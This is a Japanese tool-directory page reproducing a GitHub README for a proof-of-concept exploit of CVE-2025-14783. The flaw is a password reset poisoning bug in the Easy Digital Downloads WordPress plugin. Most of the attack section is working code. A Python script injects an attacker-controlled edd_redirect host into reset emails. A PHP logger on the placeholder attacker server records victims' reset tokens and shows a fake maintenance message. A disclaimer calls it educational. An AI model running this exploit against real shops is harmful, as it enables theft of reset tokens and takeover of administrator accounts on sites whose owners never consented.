Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-14783-POC — 🧨 CVE-2025-14783: Easy Digital Downloads アカウント乗っ取り PoC | Kitploit
ツール/GitHubGitHub/zeroethical/cve-2025-14783-poc
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用フィッシング論文と研究学習と教育
GitHubzeroethical/cve-2025-14783-poc

CVE-2025-14783-POC

🧨 CVE-2025-14783: Easy Digital Downloads アカウント乗っ取り PoC

リポジトリを見る
217ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有


🧨 CVE-2025-14783: Easy Digital Downloads アカウント乗っ取り PoC


Author Severity Vulnerability Language

「信頼は、最も悪用されやすいセキュリティ上の欠陥である。」


💀 説明

このリポジトリには、WordPress 用プラグイン Easy Digital Downloads(EDD)(バージョン <= 3.6.2)における深刻な脆弱性 Password Reset Poisoning(パスワードリセットポイズニング)に関する機能する概念実証(PoC)が含まれています。

パスワードリセット要求プロセス中の edd_redirect パラメータの検証欠如により、認証されていないリモート攻撃者が悪意のあるドメインを注入できます。これにより、ストアから送信される正規のメールに攻撃者のサーバーを指すリセットリンクが含まれることになり、アクセストークン(key)が漏えいし、管理者アカウントを含む完全な Account Takeover(ATO、アカウント乗っ取り) が可能になります。


🔍 技術的分析

この欠陥は、メール内のリセット URL を構築する関数に存在します。脆弱なコードは入力の「サニタイズ」に esc_url_raw() を使用していますが、宛先ホストを検証していません。

脆弱なコード断片

root@kitploit:~
// El desarrollador confió en que esc_url_raw era suficiente seguridad... error fatal.
$message = str_replace(
    '{password_reset_link}',
    add_query_arg(
        array(
            'edd_action' => 'password_reset_requested',
            'key'        => $key,
            'login'      => rawurlencode( $user_login ),
        ),
        esc_url_raw( $_POST['edd_redirect'] ) // <--- PUNTO DE INYECCIÓN
    ),
    $message
);

$_POST['edd_redirect'] を制御することで、生成される URL のベースを制御できます。


🛠️ インストールと使用方法

要件

  • Python 3.x
  • requests ライブラリ(pip install requests)
  • あなたが管理する Web サーバー(トークン取得用)。

1. リスナーの設定(攻撃者サーバー)

被害者のトークンを傍受するために、以下の PHP スクリプト(logger.php)を悪意のあるサーバーにアップロードします。

root@kitploit:~
<?php
// logger.php - Captura el token y el usuario
$key = $_GET['key'] ?? '';
$login = $_GET['login'] ?? '';
$ip = $_SERVER['REMOTE_ADDR'];
$date = date('Y-m-d H:i:s');

if ($key && $login) {
    $log = "[$date] TARGET: $login | TOKEN: $key | IP: $ip" . PHP_EOL;
    file_put_contents('loot.txt', $log, FILE_APPEND);
    echo "System maintenance. Please try again later."; // Ingeniería social básica
}
?>

2. エクスプロイトの実行

exploit.py スクリプトを対象に合わせて編集し、実行します。

root@kitploit:~
python3 exploit.py

エクスプロイトコード(exploit.py)

root@kitploit:~
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# CONFIGURACIÓN
TARGET_URL = "http://vulnerable-shop.com/" # URL raíz de la tienda
VICTIM_EMAIL = "[email protected]"
ATTACKER_HOST = "http://tu-servidor-malicioso.com/logger.php" 

def poison_reset_link():
    print(f"[*] Objetivo: {TARGET_URL}")
    print(f"[*] Víctima: {VICTIM_EMAIL}")
    print(f"[*] Envenenando enlace con: {ATTACKER_HOST}")

    # Payload para inyectar la redirección
    data = {
        'edd_action': 'user_send_password_reset',
        'user_email': VICTIM_EMAIL,
        'edd_redirect': ATTACKER_HOST 
    }

    try:
        # Enviamos la petición al endpoint principal (o donde EDD escuche el POST)
        r = requests.post(TARGET_URL, data=data, verify=False, timeout=10)
        
        if r.status_code == 200:
            print("[+] ¡Éxito! Correo envenenado enviado.")
            print("[*] Ahora espera a que la víctima haga clic en el enlace del correo.")
            print("[*] Revisa 'loot.txt' en tu servidor para obtener el token.")
        else:
            print(f"[-] Fallo. Código de estado: {r.status_code}")
            
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    poison_reset_link()

📊 影響

機密性完全性可用性
高 🟥高 🟥低 🟩

攻撃が成功すると、攻撃者は以下を行うことができます:

  1. パスワードリセットトークンを傍受する。
  2. 被害者(管理者を含む)のパスワードを変更する。
  3. WordPress の管理パネルにアクセスする。
  4. 悪意のあるプラグインをアップロードして(RCE)、サーバー全体を侵害する。

⚠️ 免責事項

root@kitploit:~
Este software se proporciona ÚNICAMENTE con fines educativos y de investigación de seguridad.
El autor (ZeroEthical) no se hace responsable del uso indebido de esta información.
Atacar objetivos sin consentimiento previo por escrito es ilegal y puede resultar en acciones legales severas.
Úsalo bajo tu propio riesgo en entornos controlados.

Powered by ZeroEthical
「私たちは脆弱性を修正しない。実証するのだ。」

ツールをダウンロード